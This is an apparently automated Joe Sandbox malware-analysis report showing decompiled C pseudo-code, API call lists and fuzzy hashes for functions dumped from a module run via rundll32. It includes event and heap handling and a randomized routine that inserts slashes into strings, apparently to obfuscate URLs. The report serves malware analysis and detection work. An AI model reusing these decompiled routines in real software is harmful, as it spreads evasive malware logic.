                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset$_allmul_aulldiv
                                      • String ID:
                                      • API String ID: 3041852380-0
                                      • Opcode ID: f15b6cf7dd0ade0e42915114a80064ca7fc306fc730781d57559d38a096135f7
                                      • Instruction ID: 398c26933dd85851ea5530384c8cb8a454babf0ea4943cd9108631b9264fd157
                                      • Opcode Fuzzy Hash: f15b6cf7dd0ade0e42915114a80064ca7fc306fc730781d57559d38a096135f7
                                      • Instruction Fuzzy Hash: B241E031A00219AFEF109F69DC94BEE7774EF45354F00406AB989A7281DBB0BE548BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E044B498E(signed int _a4, signed int* _a8) {
                                      				void* __ecx;
                                      				void* __edi;
                                      				signed int _t6;
                                      				intOrPtr _t8;
                                      				intOrPtr _t12;
                                      				short* _t19;
                                      				void* _t25;
                                      				signed int* _t28;
                                      				CHAR* _t30;
                                      				long _t31;
                                      				intOrPtr* _t32;
                                      
                                      				_t6 =  *0x44ba310; // 0xd448b889
                                      				_t32 = _a4;
                                      				_a4 = _t6 ^ 0x109a6410;
                                      				_t8 =  *0x44ba348; // 0x9ad5a8
                                      				_t3 = _t8 + 0x44bb87a; // 0x61636f4c
                                      				_t25 = 0;
                                      				_t30 = E044B11C3(_t3, 1);
                                      				if(_t30 != 0) {
                                      					_t25 = CreateEventA(0x44ba34c, 1, 0, _t30);
                                      					E044B6C2C(_t30);
                                      				}
                                      				_t12 =  *0x44ba2fc; // 0x4000000a
                                      				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E044B68BD() != 0) {
                                      					L12:
                                      					_t28 = _a8;
                                      					if(_t28 != 0) {
                                      						 *_t28 =  *_t28 | 0x00000001;
                                      					}
                                      					_t31 = E044B402A(_t32, 0);
                                      					if(_t31 == 0 && _t25 != 0) {
                                      						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                      					}
                                      					if(_t28 != 0 && _t31 != 0) {
                                      						 *_t28 =  *_t28 & 0xfffffffe;
                                      					}
                                      					goto L20;
                                      				} else {
                                      					_t19 =  *0x44ba124( *_t32, 0x20);
                                      					if(_t19 != 0) {
                                      						 *_t19 = 0;
                                      						_t19 = _t19 + 2;
                                      					}
                                      					_t31 = E044B7928(0,  *_t32, _t19, 0);
                                      					if(_t31 == 0) {
                                      						if(_t25 == 0) {
                                      							L22:
                                      							return _t31;
                                      						}
                                      						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                      						if(_t31 == 0) {
                                      							L20:
                                      							if(_t25 != 0) {
                                      								CloseHandle(_t25);
                                      							}
                                      							goto L22;
                                      						}
                                      					}
                                      					goto L12;
                                      				}
                                      			}


                                      APIs
                                        • Part of subcall function 044B11C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04E69D70,00000000,?,?,69B25F44,00000005,044BA00C,4D283A53,?,?), ref: 044B11F9
                                        • Part of subcall function 044B11C3: lstrcpy.KERNEL32(00000000,00000000), ref: 044B121D
                                        • Part of subcall function 044B11C3: lstrcat.KERNEL32(00000000,00000000), ref: 044B1225
                                      • CreateEventA.KERNEL32(044BA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,044B7187,?,?,?), ref: 044B49CF
                                        • Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      • WaitForSingleObject.KERNEL32(00000000,00004E20,044B7187,00000000,00000000,?,00000000,?,044B7187,?,?,?), ref: 044B4A2F
                                      • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,044B7187,?,?,?), ref: 044B4A5D
                                      • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,044B7187,?,?,?), ref: 044B4A75
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                      • String ID:
                                      • API String ID: 73268831-0
                                      • Opcode ID: bc2ed98a4f83b7f72aac94bcc2103e92ba9a5f0eee68f1b3bdfe7999547352ba
                                      • Instruction ID: c68d80fd0e3869c32ce6d30b328547afb3b5962f2dec197a49c4060723290261
                                      • Opcode Fuzzy Hash: bc2ed98a4f83b7f72aac94bcc2103e92ba9a5f0eee68f1b3bdfe7999547352ba
                                      • Instruction Fuzzy Hash: D921B6325007116BEF315E699C44AEB72A9EB8CB15B05452BFDC1A7343DB65EC0186E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 39%
                                      			E044B70D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				void* _v28;
                                      				char _v32;
                                      				void* __esi;
                                      				void* _t29;
                                      				void* _t38;
                                      				signed int* _t39;
                                      				void* _t40;
                                      
                                      				_t36 = __ecx;
                                      				_v32 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v12 = _a4;
                                      				_t38 = E044B54BB(__ecx,  &_v32);
                                      				if(_t38 != 0) {
                                      					L12:
                                      					_t39 = _a8;
                                      					L13:
                                      					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                      						_t23 =  &(_t39[1]);
                                      						if(_t39[1] != 0) {
                                      							E044B78BF(_t23);
                                      						}
                                      					}
                                      					return _t38;
                                      				}
                                      				if(E044B3695(0x40,  &_v16) != 0) {
                                      					_v16 = 0;
                                      				}
                                      				_t40 = CreateEventA(0x44ba34c, 1, 0,  *0x44ba3e4);
                                      				if(_t40 != 0) {
                                      					SetEvent(_t40);
                                      					Sleep(0xbb8);
                                      					CloseHandle(_t40);
                                      				}
                                      				_push( &_v32);
                                      				if(_a12 == 0) {
                                      					_t29 = E044B71B6(_t36);
                                      				} else {
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_t29 = E044B3472(_t36);
                                      				}
                                      				_t41 = _v16;
                                      				_t38 = _t29;
                                      				if(_v16 != 0) {
                                      					E044B3AC2(_t41);
                                      				}
                                      				if(_t38 != 0) {
                                      					goto L12;
                                      				} else {
                                      					_t39 = _a8;
                                      					_t38 = E044B498E( &_v32, _t39);
                                      					goto L13;
                                      				}
                                      			}


                                      APIs
                                      • CreateEventA.KERNEL32(044BA34C,00000001,00000000,00000040,?,?,76DDF710,00000000,76DDF730), ref: 044B7129
                                      • SetEvent.KERNEL32(00000000), ref: 044B7136
                                      • Sleep.KERNEL32(00000BB8), ref: 044B7141
                                      • CloseHandle.KERNEL32(00000000), ref: 044B7148
                                        • Part of subcall function 044B71B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,044B7168,?,044B7168,?,?,?,?,?,044B7168,?), ref: 044B7290
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                      • String ID:
                                      • API String ID: 2559942907-0
                                      • Opcode ID: 7cace70d8da2b0110e1e6782a5a4ba747b93a63eb06654210beaba06706e985b
                                      • Instruction ID: ba271bce29c9dc2fa762fedc7df546f76dab1d9ffdfbb0d44d0f706f70916121
                                      • Opcode Fuzzy Hash: 7cace70d8da2b0110e1e6782a5a4ba747b93a63eb06654210beaba06706e985b
                                      • Instruction Fuzzy Hash: B7216572D00219ABEF20AFE58884CDF7779EB84355B05442BEA92A7300D634B9458BF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E044B264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                      				intOrPtr _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				intOrPtr _t26;
                                      				intOrPtr* _t28;
                                      				intOrPtr _t31;
                                      				intOrPtr* _t32;
                                      				void* _t39;
                                      				int _t46;
                                      				intOrPtr* _t47;
                                      				int _t48;
                                      
                                      				_t47 = __eax;
                                      				_push( &_v12);
                                      				_push(__eax);
                                      				_t39 = 0;
                                      				_t46 = 0;
                                      				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                      				_v8 = _t26;
                                      				if(_t26 < 0) {
                                      					L13:
                                      					return _v8;
                                      				}
                                      				if(_v12 == 0) {
                                      					Sleep(0xc8);
                                      					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                      				}
                                      				if(_v8 >= _t39) {
                                      					_t28 = _v12;
                                      					if(_t28 != 0) {
                                      						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                      						_v8 = _t31;
                                      						if(_t31 >= 0) {
                                      							_t46 = lstrlenW(_v16);
                                      							if(_t46 != 0) {
                                      								_t46 = _t46 + 1;
                                      								_t48 = _t46 + _t46;
                                      								_t39 = E044B6D63(_t48);
                                      								if(_t39 == 0) {
                                      									_v8 = 0x8007000e;
                                      								} else {
                                      									memcpy(_t39, _v16, _t48);
                                      								}
                                      								__imp__#6(_v16);
                                      							}
                                      						}
                                      						_t32 = _v12;
                                      						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                      					}
                                      					 *_a4 = _t39;
                                      					 *_a8 = _t46 + _t46;
                                      				}
                                      				goto L13;
                                      			}















                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeSleepStringlstrlenmemcpy
                                      • String ID:
                                      • API String ID: 1198164300-0
                                      • Opcode ID: f33f201deff422e9fe8e987983b10a68c1431cde849a51111e353c541d740ae2
                                      • Instruction ID: d77573f21dfe604d4844c878e53d579e6ab55e9d3a2b6656375afcdaaa170a3c
                                      • Opcode Fuzzy Hash: f33f201deff422e9fe8e987983b10a68c1431cde849a51111e353c541d740ae2
                                      • Instruction Fuzzy Hash: 1D214475900609EFDF11DFA9C9889DEBBB4FF48314B1041AAE945E7300EB70EA45DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E044B4162(unsigned int __eax, void* __ecx) {
                                      				void* _v8;
                                      				void* _v12;
                                      				signed int _t21;
                                      				signed short _t23;
                                      				char* _t27;
                                      				void* _t29;
                                      				void* _t30;
                                      				unsigned int _t33;
                                      				void* _t37;
                                      				unsigned int _t38;
                                      				void* _t41;
                                      				void* _t42;
                                      				int _t45;
                                      				void* _t46;
                                      
                                      				_t42 = __eax;
                                      				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                      				_t38 = __eax;
                                      				_t30 = RtlAllocateHeap( *0x44ba2d8, 0, (__eax >> 3) + __eax + 1);
                                      				_v12 = _t30;
                                      				if(_t30 != 0) {
                                      					_v8 = _t42;
                                      					do {
                                      						_t33 = 0x18;
                                      						if(_t38 <= _t33) {
                                      							_t33 = _t38;
                                      						}
                                      						_t21 =  *0x44ba2f0; // 0xc1be758d
                                      						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                      						 *0x44ba2f0 = _t23;
                                      						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                      						memcpy(_t30, _v8, _t45);
                                      						_v8 = _v8 + _t45;
                                      						_t27 = _t30 + _t45;
                                      						_t38 = _t38 - _t45;
                                      						_t46 = _t46 + 0xc;
                                      						 *_t27 = 0x2f;
                                      						_t13 = _t27 + 1; // 0x1
                                      						_t30 = _t13;
                                      					} while (_t38 > 8);
                                      					memcpy(_t30, _v8, _t38 + 1);
                                      				}
                                      				return _v12;
                                      			}


















                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,044B1DC6,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B416D
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 044B4185
                                      • memcpy.NTDLL(00000000,04E695B0,-00000008,?,?,?,044B1DC6,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B41C9
                                      • memcpy.NTDLL(00000001,04E695B0,00000001,044B58D7,00000000,04E695B0), ref: 044B41EA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpy$AllocateHeaplstrlen
                                      • String ID:
                                      • API String ID: 1819133394-0
                                      • Opcode ID: 313a343f2e9cca01ca32d190b9c3ba418e0ccdde02db659ece831dfe59480317
                                      • Instruction ID: 1e4ba1ff02b1732cda6efe91a657213d4a2b3241c6395d0b01d4585d7b3b0ced
                                      • Opcode Fuzzy Hash: 313a343f2e9cca01ca32d190b9c3ba418e0ccdde02db659ece831dfe59480317
                                      • Instruction Fuzzy Hash: AB1106B2A00215BFEB148F69DC88D9ABFAEEB90261B050176F54497341E775AE0487E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B227F(void* __esi) {
                                      				struct _SECURITY_ATTRIBUTES* _v4;
                                      				void* _t8;
                                      				void* _t10;
                                      
                                      				_v4 = 0;
                                      				memset(__esi, 0, 0x38);
                                      				_t8 = CreateEventA(0, 1, 0, 0);
                                      				 *(__esi + 0x1c) = _t8;
                                      				if(_t8 != 0) {
                                      					_t10 = CreateEventA(0, 1, 1, 0);
                                      					 *(__esi + 0x20) = _t10;
                                      					if(_t10 == 0) {
                                      						CloseHandle( *(__esi + 0x1c));
                                      					} else {
                                      						_v4 = 1;
                                      					}
                                      				}
                                      				return _v4;
                                      			}







                                      APIs
                                      • memset.NTDLL ref: 044B228D
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76DC81D0,00000000,00000000), ref: 044B22A2
                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044B22AF
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B22C1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateEvent$CloseHandlememset
                                      • String ID:
                                      • API String ID: 2812548120-0
                                      • Opcode ID: 7c6237e2debd12e0dc9ef8b3c1696efa5c66ffd929ed6bac7755470f3d9f48b5
                                      • Instruction ID: b4b1ff2406077f897e6e02732e21231d966edb1deb5c889be5154116bb3df961
                                      • Opcode Fuzzy Hash: 7c6237e2debd12e0dc9ef8b3c1696efa5c66ffd929ed6bac7755470f3d9f48b5
                                      • Instruction Fuzzy Hash: 3BF054F15047087FD7206F66DCC4C67FBACEB41198B114D6EF18692201D675B8054AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B7607() {
                                      				void* _t1;
                                      				intOrPtr _t5;
                                      				void* _t6;
                                      				void* _t7;
                                      				void* _t11;
                                      
                                      				_t1 =  *0x44ba30c; // 0x2cc
                                      				if(_t1 == 0) {
                                      					L8:
                                      					return 0;
                                      				}
                                      				SetEvent(_t1);
                                      				_t11 = 0x7fffffff;
                                      				while(1) {
                                      					SleepEx(0x64, 1);
                                      					_t5 =  *0x44ba35c; // 0x0
                                      					if(_t5 == 0) {
                                      						break;
                                      					}
                                      					_t11 = _t11 - 0x64;
                                      					if(_t11 > 0) {
                                      						continue;
                                      					}
                                      					break;
                                      				}
                                      				_t6 =  *0x44ba30c; // 0x2cc
                                      				if(_t6 != 0) {
                                      					CloseHandle(_t6);
                                      				}
                                      				_t7 =  *0x44ba2d8; // 0x4a70000
                                      				if(_t7 != 0) {
                                      					HeapDestroy(_t7);
                                      				}
                                      				goto L8;
                                      			}









                                      APIs
                                      • SetEvent.KERNEL32(000002CC,00000001,044B5E70), ref: 044B7612
                                      • SleepEx.KERNEL32(00000064,00000001), ref: 044B7621
                                      • CloseHandle.KERNEL32(000002CC), ref: 044B7642
                                      • HeapDestroy.KERNEL32(04A70000), ref: 044B7652
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseDestroyEventHandleHeapSleep
                                      • String ID:
                                      • API String ID: 4109453060-0
                                      • Opcode ID: a88efa1f0903ad821b4e4b39f0cf2fe7f1b9fa1f5030a85f3a1abae80dc1b22f
                                      • Instruction ID: 37acb15a7809b4bebdd057984a7ff988cc16a55727e6aed3b8abbb014aaaafdd
                                      • Opcode Fuzzy Hash: a88efa1f0903ad821b4e4b39f0cf2fe7f1b9fa1f5030a85f3a1abae80dc1b22f
                                      • Instruction Fuzzy Hash: 4CF0F8B1A4171297EB206B3D9848A8337A8EB54761B090512BA40E2381CB28EC4496E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E044B72C7() {
                                      				void* _v0;
                                      				void** _t3;
                                      				void** _t5;
                                      				void** _t7;
                                      				void** _t8;
                                      				void* _t10;
                                      
                                      				_t3 =  *0x44ba3cc; // 0x4e695b0
                                      				__imp__( &(_t3[0x10]));
                                      				while(1) {
                                      					_t5 =  *0x44ba3cc; // 0x4e695b0
                                      					_t1 =  &(_t5[0x16]); // 0x0
                                      					if( *_t1 == 0) {
                                      						break;
                                      					}
                                      					Sleep(0xa);
                                      				}
                                      				_t7 =  *0x44ba3cc; // 0x4e695b0
                                      				_t10 =  *_t7;
                                      				if(_t10 != 0 && _t10 != 0x44bb827) {
                                      					HeapFree( *0x44ba2d8, 0, _t10);
                                      					_t7 =  *0x44ba3cc; // 0x4e695b0
                                      				}
                                      				 *_t7 = _v0;
                                      				_t8 =  &(_t7[0x10]);
                                      				__imp__(_t8);
                                      				return _t8;
                                      			}










                                      APIs
                                      • RtlEnterCriticalSection.NTDLL(04E69570), ref: 044B72D0
                                      • Sleep.KERNEL32(0000000A), ref: 044B72DA
                                      • HeapFree.KERNEL32(00000000), ref: 044B7308
                                      • RtlLeaveCriticalSection.NTDLL(04E69570), ref: 044B731D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                      • String ID:
                                      • API String ID: 58946197-0
                                      • Opcode ID: 26a7c5f485129e7e53edd5418bcd74f830a1d5a50795f0a8cd5ae343d2798f98
                                      • Instruction ID: cb2cacaaa165c9457aff500d6b53ae054bcdccaab77da881628374cca9464415
                                      • Opcode Fuzzy Hash: 26a7c5f485129e7e53edd5418bcd74f830a1d5a50795f0a8cd5ae343d2798f98
                                      • Instruction Fuzzy Hash: 61F0DAB42007019BFB188F54D889B6677A5EB84340B045415FA42E7390DA38BC11DAA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E044B45C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                      				intOrPtr* _v8;
                                      				void* _t17;
                                      				intOrPtr* _t22;
                                      				void* _t27;
                                      				char* _t30;
                                      				void* _t33;
                                      				void* _t34;
                                      				void* _t36;
                                      				void* _t37;
                                      				void* _t39;
                                      				int _t42;
                                      
                                      				_t17 = __eax;
                                      				_t37 = 0;
                                      				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                      				_t2 = _t17 + 1; // 0x1
                                      				_t28 = _t2;
                                      				_t34 = E044B6D63(_t2);
                                      				if(_t34 != 0) {
                                      					_t30 = E044B6D63(_t28);
                                      					if(_t30 == 0) {
                                      						E044B6C2C(_t34);
                                      					} else {
                                      						_t39 = _a4;
                                      						_t22 = E044B7A57(_t39);
                                      						_v8 = _t22;
                                      						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                      							_a4 = _t39;
                                      						} else {
                                      							_t26 = _t22 + 2;
                                      							_a4 = _t22 + 2;
                                      							_t22 = E044B7A57(_t26);
                                      							_v8 = _t22;
                                      						}
                                      						if(_t22 == 0) {
                                      							__imp__(_t34, _a4);
                                      							 *_t30 = 0x2f;
                                      							 *((char*)(_t30 + 1)) = 0;
                                      						} else {
                                      							_t42 = _t22 - _a4;
                                      							memcpy(_t34, _a4, _t42);
                                      							 *((char*)(_t34 + _t42)) = 0;
                                      							__imp__(_t30, _v8);
                                      						}
                                      						 *_a8 = _t34;
                                      						_t37 = 1;
                                      						 *_a12 = _t30;
                                      					}
                                      				}
                                      				return _t37;
                                      			}















                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,044B6973,?,?,?,?,00000102,044B37A0,?,?,76DC81D0), ref: 044B45D0
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                        • Part of subcall function 044B7A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,044B45FE,00000000,00000001,00000001,?,?,044B6973,?,?,?,?,00000102), ref: 044B7A65
                                        • Part of subcall function 044B7A57: StrChrA.SHLWAPI(?,0000003F,?,?,044B6973,?,?,?,?,00000102,044B37A0,?,?,76DC81D0,00000000), ref: 044B7A6F
                                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044B6973,?,?,?,?,00000102,044B37A0,?), ref: 044B462E
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 044B463E
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 044B464A
                                      Similarity
                                      • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                      • String ID:
                                      • API String ID: 3767559652-0
                                      • Opcode ID: ec6f8d4bd5523991d7e3409c20af29b91722dc6ec1f28c87eba4f16a96038368
                                      • Instruction ID: 80353cede0a84a26224b18f10ae6b126c66f4ae5d76fe7f580e4a861825586b6
                                      • Opcode Fuzzy Hash: ec6f8d4bd5523991d7e3409c20af29b91722dc6ec1f28c87eba4f16a96038368
                                      • Instruction Fuzzy Hash: CC21A272504255EBDF125F79C884EEB7FB8EF46294F054056F9859B202E639E901CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B28C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                      				void* _v8;
                                      				void* _t18;
                                      				int _t25;
                                      				int _t29;
                                      				int _t34;
                                      
                                      				_t29 = lstrlenW(_a4);
                                      				_t25 = lstrlenW(_a8);
                                      				_t18 = E044B6D63(_t25 + _t29 + _t25 + _t29 + 2);
                                      				_v8 = _t18;
                                      				if(_t18 != 0) {
                                      					_t34 = _t29 + _t29;
                                      					memcpy(_t18, _a4, _t34);
                                      					_t10 = _t25 + 2; // 0x2
                                      					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                      				}
                                      				return _v8;
                                      			}









                                      APIs
                                      • lstrlenW.KERNEL32(004F0053,?,76D85520,00000008,04E693F4,?,044B21EB,004F0053,04E693F4,?,?,?,?,?,?,044B66BE), ref: 044B28D4
                                      • lstrlenW.KERNEL32(044B21EB,?,044B21EB,004F0053,04E693F4,?,?,?,?,?,?,044B66BE), ref: 044B28DB
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • memcpy.NTDLL(00000000,004F0053,76D869A0,?,?,044B21EB,004F0053,04E693F4,?,?,?,?,?,?,044B66BE), ref: 044B28FB
                                      • memcpy.NTDLL(76D869A0,044B21EB,00000002,00000000,004F0053,76D869A0,?,?,044B21EB,004F0053,04E693F4), ref: 044B290E
                                      Similarity
                                      • API ID: lstrlenmemcpy$AllocateHeap
                                      • String ID:
                                      • API String ID: 2411391700-0
                                      • Opcode ID: 875d1f0e13a532733b8186df25564508e43777a13e997f4467e025c81451185e
                                      • Instruction ID: e8a58b7b4ca9748fc3f1675a5709b55d994b99607be53ad7415e85f3a0f2404c
                                      • Opcode Fuzzy Hash: 875d1f0e13a532733b8186df25564508e43777a13e997f4467e025c81451185e
                                      • Instruction Fuzzy Hash: 99F0F976900119BB9F11EFAACC84CDF7BACEF092587164067ED08D7206E675EA149BF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlen.KERNEL32(04E69B68,00000000,00000000,00000000,044B5902,00000000), ref: 044B394C
                                      • lstrlen.KERNEL32(?), ref: 044B3954
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • lstrcpy.KERNEL32(00000000,04E69B68), ref: 044B3968
                                      • lstrcat.KERNEL32(00000000,?), ref: 044B3973
                                      Similarity
                                      • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 74227042-0
                                      • Opcode ID: 2cf56fe40993678f205bf0b228240159824c8028c52bc53080a5b56660fa79ea
                                      • Instruction ID: db561b1d81a549188975f0a6f9264609eac1d2495db7ca3403496ce45a48b6d2
                                      • Opcode Fuzzy Hash: 2cf56fe40993678f205bf0b228240159824c8028c52bc53080a5b56660fa79ea
                                      • Instruction Fuzzy Hash: 0EE01273905A21A797115BA5AC48C9BBBADEF89761705041BFB00D3110C7699C05CBE1
